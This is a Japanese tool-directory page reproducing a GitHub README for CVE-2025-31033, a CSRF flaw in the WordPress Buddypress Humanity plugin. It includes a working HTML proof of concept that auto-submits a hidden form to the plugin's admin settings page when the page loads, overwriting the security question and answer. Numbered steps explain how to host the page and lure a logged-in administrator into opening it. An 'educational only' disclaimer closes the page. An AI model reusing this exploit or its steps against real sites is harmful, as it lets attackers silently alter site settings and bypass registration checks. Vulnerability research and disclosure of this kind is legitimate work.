Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 には、クロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在します。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-31033
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ論文と研究学習と教育
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 には、クロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2025-31033 - WordPress Buddypress Humanity プラグイン <= 1.2 の CSRF

🛡️ 脆弱性の概要

WordPress 用の Buddypress Humanity プラグイン(バージョン <= 1.2)は、クロスサイトリクエストフォージェリ(CSRF) に対して脆弱です。
この脆弱性により、攻撃者は権限の高いユーザー(例:管理者)に、セキュリティの質問や回答などのプラグイン設定を意図せず変更させ、ユーザー検証ロジックを回避させることができます。


🐞 脆弱性の種類

  • クロスサイトリクエストフォージェリ(CSRF)
  • 影響を受けるコンポーネント: bph-settings ページ(管理者のみ)
  • CVE: CVE-2025-31033
  • リスク: CVSS 9.8

🚨 影響

悪用に成功した場合、攻撃者は以下を行うことができます:

  • ユーザー登録時に使用されるセキュリティの質問と回答を変更する
  • 新しい回答を知ることで人間確認をバイパスする
  • ユーザー登録を自動化する(権限昇格と組み合わせる可能性あり)
  • ユーザーの操作なしに登録フォームの保護を悪用する

🎯 影響を受けるプラグイン

  • 名前: Buddypress Humanity
  • バージョン: ≤ 1.2
  • スラッグ: buddypress-humanity
  • テスト環境: WordPress 6.x + BuddyPress 有効

💥 概念実証(HTMLエクスプロイト)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
    <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
    <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
    <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
    <input type="hidden" name="bph_submit" value="1">
  </form>
</body>
</html>

☠️ このページが認証済みの管理者によって開かれると、プラグイン設定が気付かれずに変更されます。


🔧 悪用方法

  1. PoC HTML を任意の外部サーバーにホストします。
  2. ログイン済みの WordPress 管理者を騙してそのページにアクセスさせます。
  3. アクセスすると、ブラウザが自動的にフォームを送信します。
  4. プラグインのセキュリティの質問と回答が更新されます。
  5. 攻撃者は既知の回答を使用して登録できるようになります。

🧪 悪用成功時の結果:

  • 変更された質問: I’m Nxploited | Khaled Alenazi
  • 変更された回答: Nxploit
  • 「Nxploit」と入力したユーザーはすべて検証をバイパスします。

⚠️ 免責事項

この概念実証は教育目的のみです。
責任を持って使用し、所有していないシステムでテストしないでください。
著者は、誤用または損害について一切の責任を負いません。


👤 作成者

Nxploited | Khaled Alenazi

ツールをダウンロード